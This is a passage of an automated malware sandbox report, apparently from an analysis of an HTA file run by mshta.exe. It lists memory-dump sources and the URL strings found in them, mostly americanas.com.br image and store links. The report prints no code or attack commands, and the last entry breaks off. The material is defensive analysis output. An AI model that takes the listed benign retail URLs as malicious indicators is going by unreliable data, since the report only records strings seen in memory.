00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-banners_home_mob-campanhas-home-300x450-31
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542414345.0000000009699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_desk-2c70954c6dab.png
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_desk-2c70954c6dab.pngPI-
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542414345.0000000009699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_desk-2c70954c6dab.pngxd
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_mob-226821f368af.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542652490.0000000009645000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567444909.00000000095A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570171888.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558448951.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515790688.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_mob-0600bcc12452.png
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555668791.0000000002F02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574609531.000000000962B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570396269.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/exclusivo_app-desk-5c02896f8c53.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12569631340.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/exclusivo_app-mob-19fde28501d5.png
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574609531.000000000962B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542695119.000000000963E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12553270675.000000000963E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/09/sec-brinquedos_esporte-e-lazer-destaque-desk
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/09/sec-brinquedos_esporte-e-lazer-destaque-mob-
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557426752.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570171888.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558448951.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558658695.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-imag
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imagesw.i(
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509642076.00000000095F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508375868.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://informacoes.anatel.gov.br/paineis/certificacao-de-produtos/consulta-de-produtos
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12552919479.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566877720.000000000AB6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550560614.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512233499.000000000C0AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nossaslojas.americanas.com.br/?chave=dk_ft_lojas
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nossaslojas.americanas.com.br/?chave=dk_ft_lojaspkV
Source: mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nossaslojas.americanas.com.br/?chave=o2o_hm_00_0_0_nossaslojas4s
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567232187.00000000095D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502431408.00000000095D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://nossaslojas.americanas.com.br/?chave=prf_hm_0_tt_9_lojas
Source: mshta.exe, 00000001.00000003.11774937152.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541515073.000000000953E000.00000004.00000020.00020000.00000000.sdmp, gtm[1].js.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579079120.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507926809.000000000BEC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.000000000963F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577286875.000000000A980000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 